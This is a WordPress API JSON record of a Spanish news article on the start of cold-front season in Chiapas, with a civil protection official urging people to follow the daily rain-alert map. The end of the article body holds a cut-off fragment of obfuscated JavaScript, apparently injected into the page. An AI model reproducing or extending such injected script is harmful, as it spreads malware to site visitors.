{"id":17881,"date":"2024-09-17T02:02:15","date_gmt":"2024-09-17T02:02:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17881"},"modified":"2024-09-17T02:02:16","modified_gmt":"2024-09-17T02:02:16","slug":"alertan-por-arranque-de-temporada-de-frentes-frios-que-afectaran-a-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17881","title":{"rendered":"Alertan por arranque de temporada de frentes fr\u00edos que afectar\u00e1n a Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"614\" height=\"448\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726538376726.jpg\" alt=\"\" class=\"wp-image-17882\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726538376726.jpg 614w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726538376726-300x219.jpg 300w\" sizes=\"auto, (max-width: 614px) 100vw, 614px\" \/><\/figure>\n\n\n\n<p>Miguel Mart\u00ednez.<\/p>\n\n\n\n<p>16 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; El Secretario de Protecci\u00f3n Civil, Luis Manuel Garc\u00eda Moreno, hizo un llamado a la poblaci\u00f3n a la prevenci\u00f3n y a checar diariamente los protocolos que emite el organismo a trav\u00e9s del procedimiento estatal de alerta por lluvias por el arranque de la temporada de frentes fr\u00edos.<\/p>\n\n\n\n<p>Dijo que por, la situaci\u00f3n geograf\u00eda de Chiapas los frentes fr\u00edos no son caracter\u00edsticos por los descensos de temperatura dr\u00e1sticos.<\/p>\n\n\n\n<p>\u201cEn Chiapas estamos hacia el tr\u00f3pico, tenemos clima tropical, los frentes fr\u00edos, generan muchas precipitaciones, de hecho, hist\u00f3ricamente, han generado m\u00e1s declaratorias de emergencia o desastres que los propios huracanes\u201d, dijo.<\/p>\n\n\n\n<p>Explic\u00f3 que a estos fen\u00f3menos, tambi\u00e9n llamados sistemas frontales, hay \u201cque tenerles mucho respeto, mucho cuidado y activar los protocolos de prevenci\u00f3n; por eso emitimos todos los d\u00edas, a las 6 de la ma\u00f1ana, el procedimiento estatal de alerta por lluvias\u201d.<\/p>\n\n\n\n<p>Explic\u00f3 que se trata de un mapa de Chiapas, tiene colores que funcionan como una especie de sem\u00e1foro; va de color azul, que significa peligro m\u00ednimo; pasando por el amarillo, verde, naranja y rojo; este \u00faltimo significa peligro m\u00e1ximo.<\/p>\n\n\n\n<p>La temporada de lluvias, inicia cada a\u00f1o el 15 de mayo y concluye el 30 de noviembre; paralelamente se juntan a partir de septiembre con los frentes fr\u00edos; \u201cestas condiciones de lluvias son lo que da la riqueza y la diversidad biol\u00f3gica de Chiapas\u201d, concluye Garc\u00eda Moreno.<\/p>\n\n\n\n<p>Por su parte, la Comisi\u00f3n Nacional del Agua, a trav\u00e9s del Servicio Meteorol\u00f3gico Nacional (SMN), determin\u00f3 que para esta semana para Chiapas, se pronostican lluvias muy fuertes a puntuales intensas, desde el martes hasta el viernes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Miguel Mart\u00ednez. 16 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; El Secretario de Protecci\u00f3n Civil, Luis Manuel Garc\u00eda Moreno, hizo un llamado a la poblaci\u00f3n a la prevenci\u00f3n y a checar diariamente los protocolos que emite el organismo a trav\u00e9s del procedimiento estatal de alerta por lluvias por el arranque de la temporada de frentes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17882,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17881","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17881"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17881\/revisions"}],"predecessor-version":[{"id":17883,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17881\/revisions\/17883"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17882"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17881"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}